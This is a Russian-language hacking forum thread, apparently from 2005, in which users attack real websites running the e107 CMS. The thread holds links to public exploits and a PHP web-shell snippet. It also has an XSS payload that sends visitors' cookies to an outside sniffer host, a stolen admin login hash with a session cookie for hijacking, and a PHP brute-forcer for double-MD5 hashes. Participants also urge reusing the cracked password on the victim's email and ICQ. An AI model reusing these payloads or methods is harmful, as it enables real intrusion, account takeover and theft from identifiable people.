Хотелеось бы ипытать его на прочность
я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен...
первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории :
e107_admin,e107_docs,e107_files,e107_handlers,e107 _images,e107_languages,e107_plugins,e107_themes
но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config
так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так www.sait.net/e107_plugins/autogallery/autogallery.php?show=любой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более...
и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1

Tikson, в след. раз пиши так, чтобы твой урл не был реальным сайтом..) например,
http://[example]/e107_plagins/etc..

Теперь по теме.
Вот тебе 2 эксплоита).
http://milw0rm.com/id.php?id=1106
http://milw0rm.com/id.php?id=704

Rebz спасибо =)))
ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =)
СПАСИБО!!!

Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704
есть вопрос что значит "b4d upload!!"
я все делал как в сплоите написано
perl 1\e107.pl www.nradio.ru
1 - это папка в которой у меня лежит сплоит
и вмне значит выводится сообщение
## www.nradio.ru
## b4d upload!!

что это начит??? и как от этого танцевать????

гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..

Помоему та стоит закачка файла с адреса http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php
но выдаётся какая-то ошибка....
Попробуй зафигачь свой и в файле пропиши
<?
echo "<pre>";
sysem($cmd);
echo "</pre>";
?>

Мож получится.

это в картинке можно писать??? там вообщето нельзя фаилы закачивать

http://nradio-ru.mitos.ru/e107_handlers/htmlarea/popups/ImageManager/images.php
картинку удалить у меня не получилось((( может дело в этом

Да... возможно, они на папочку upload поставили права не 777. -)
В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).

Kond4r как ты зделал это?????? как залил и что????

да нихрена я не сделал...(((
файл images.php у них там поумолчанию уже находился, как я понял ксплойд использует уязвимость в этом файле для того чтобы закачать на сервер свой... Но как сказал Rebz они наверно там права на запись отрубили... поэтому не удлить не закачать скрипт не получится... Хотя можно попробовать в другую директорию им кинуть, вообщем поэксперементировать.
А вообще попробуй лучше XSS времени меньше потратишь: захреначил его и пошёл пивко пить, пишёл хеши собрал пароли нашёл и всё...
ЗЫ: Это конечно в идеале, а на самом деле хз как получится...

тоест ты предлагаешь вот это
##############################
www.ut (http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;)'
##############################
тока ничего не получается
я когда это в подпись вставил то ничего небыло видно однако почумуто была ковычка видимо что то не так ???
ps может их умоломать поставить права 777 мол так сайт лючше работать будет хотя непохоже что админ лопух он одминит по крайне мене еще 5 сайтов в том числе и сайт http://www.e107.ru/

[cоlor=#EFEFEF][иrl]www.ut[иrl=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=alert();this.sss=null`style='font-size:0;][/иrl][/url]'[/cоlor]

У меня всё работает.... Действуй! токо перепиши, я там "о" русскую поставил и "и" заместо "u"

Мда... какой-то сраненький форум....
Я тут 5 дней уже Ipb ломаю там ася у чела как у меня мобильный - ну очень хочется...
А тут за 2 часа всё ясно и понятно

Kond4r так надо еще поломать а потом уже ... =)
а насчет си давай это хорошее дело =)

подожди подожди а где www.antichat.ru/cgi-bin/s.jpg ???? куда куки пойдут ...

login: neo
id: 1
hash:55994831ef1efc93f541e94bf84fd1cd

ТОКО ТАМ $HASH=MD5(MD5($PASS))

Либо: в куках пропиши:

rcookie=1.55994831ef1efc93f541e94bf84fd1cd

Kond4r Молоца !!!
Как хеши раздобыл, с помошью xss ? Исходник который ты использовал можешь привести(полный)?
ps этот "neo" радиcт-шифровщик какой-то, его MD5 хеш бруту не поддается, буду в куки пихать...

это двойной хэш... так просто его не подберёшь...
Да ХSS. А исходник тот который Rebz дал, я там токо адрес снифера сменил на свой...

А исходник тот который Rebz дал

Рад помочь -) молодцы ребята, что разобрались =)

<?

$hash="55994831ef1efc93f541e94bf84fd1cd";
$sym="1234567890";
$max=3;
$min=6;
$var=0;
$time=mktime();
$timenow=mktime();
$sec=0;
for($i=$max;$i<=$min;$i++)
{
$var+=pow(strlen($sym),$i);
}
$filename="nordmoon_rnd6";
$handle = fopen($filename, 'a');
function outpass($text,$sym)
{
global $min,$max,$filename,$handle,$hash,$count,$time,$se c,$var;
if(strlen($text)<$min)
{
for($i=0;$i<strlen($sym);$i++)
{
$text1=$text;
$text1.="$sym[$i]";

if(($time+1)==mktime()) { $sec++; $time=mktime(); echo "$count - Variantov iz $var Speed ".round($count/$sec)." Var per sec. Ostalos ".round(($var-$count)/round($count/$sec))." sec \n"; }
if(strlen($text)>$min) break;
if(strlen($text1)>=$max)
{
$count++;

if($hash==md5(md5($text1)))
{
fwrite($handle, "$text1");
echo "!!!!!!! $text1 !!!!!!!!\n";
}
}

outpass($text1,$sym);

}

}

}
$count=0;
for($i=0;$i<strlen($sym);$i++)
{
$text=$sym[$i];
if($hash==md5(md5($text)))
{
fwrite($handle, "$text");
echo "!!!!!!! $text1 !!!!!!!!\n";

}
$count++;
outpass($text,$sym);
}
fclose($handle);

?>



Вот тебе брут... Токо там мин с макс перепутаны... Я накануне с лазанами нарезался так что сам удивился, что что-то написал вообще.... С помощью него попробуй набрутить.
Либо http://www.antsight.com/zsl/rainbowcrack/ там скачай исходники брута, децл измени, откэмпи и юзай.


А так кукисы изай. Админка там простая) токо почему-то база не качается( ну да лан сам разберёшься...
ЗЫ: Сильно не критекуйте))) Я имею ввиду код.

это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)

Скачал исходники брута ( http://www.antsight.com/zsl/rainbowcrack/rainbowcrack-1.2-win.zip ) а как запустить? и на каком языке он сделан?
ps я просто парю потому что, хочу таким образом "разделаться" еще с 3 такими же движками (прикинь они полностью одинаковые =) )
---
млин нео пароль сменил =( .kond4r поосторожней надо быть, просто я там трепался мол поломаю вас и тд и тп ну нео посмеялся думал я шучу,он вообще админ шустрый, в любое время может на сайт зайти, если получится еще раз с xss то надо будет как-то закрепиться... да зачем ты там оставил фаил "own.php" ты думаешь он бы его не заметил..?=)
...нео зашол прям сразу за тобой(neo ... 12.10.2005 - 03:16:05
kond4r ... 12.10.2005 - 03:15:06
), может он тебя заметил, тогда дело плохо

Нихрена он не сменил!!!!
файл я там не оставлял! всё чисто, даже xss удалил из форума, да и ещё пару сообщений где кто-то этим xss пытался тож ссесию сбрить, причём не удачно: какой-то 0007 написал через жопу, так на форуме было сообщение вида new Image; i.src=.... ну и т.д.

Токо что заходил под его кукой всё нормально!

...нео зашол прям сразу за тобой(neo ... 12.10.2005 - 03:16:05 kond4r ... 12.10.2005 - 03:15:06

это я и защёл)))) сначала так, потом как нео))))
нео в люльке пузыри пускал в это время.

Кстати когда пароль подберёшь, попробуй на асе и мыле его, может подойдёт)
мыло у него странное mail@e107.ru

Kond4r млин =))))))))))
это ж я 0007 , это мое кодовое имя в данной операции не мог жы я зайти как Tikson, neo бы сразу в гугле мой бы ник ввел бы и тогда пипец, я ж одно время днем и ночью форумы phpbb и другие ломал, на меня даже какой то админ помню наехал обещал расправой, обошлось...
А я чето с его куками зайти не могу, может я пытался зайти когда там уже кто-то был...
ты не ответил
####
это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)

Скачал исходники брута ( http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) а как запустить? и на каком языке он сделан?
####

А я чето с его куками зайти не могу, может я пытался зайти когда там уже кто-то был...
вообще по идее должно быть пок, там мона под одним паролем хоть всей россией сидеть... значит что-то на так в куках прописал там нет ссесии!! в куках прописывается токо id.passhash и всё.
это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)
нет это брут специально для двойного хэша, при желании его мна изменить, чтоб он хэши из файла какого-нить выжёргивал, а так просто меняй $hash

Это пхп... Юзать >php файл.php

Скачал исходники брута ( http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) а как запустить? и на каком языке он сделан?

сделан на си, я лично строил в unix...

лана еще раз с куками зайду, странно первый раз полусилось,второй нет, но я еще попробую...
вообщето это понятно что это php (<? содержание ?>) , только когда я пишу в cmd
php 1\neo.php
пишут что php не я вляется внутренней или внешней командой, исполняемой проограммой или пакетным фаилом
вобщем получается что мне надо поставить php?!!! ага а под винду он есть???=)
блин брут (http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) на си...=( а у меня винда и эмулятора нет и шела нет ...

http://www.php.net/downloads.php качай и юзай то что я те дал)
Ну если каки евопросы стучись 311-628-846

эй! ребят! только не надо флуда и оффтопа. Высказываемся по теме.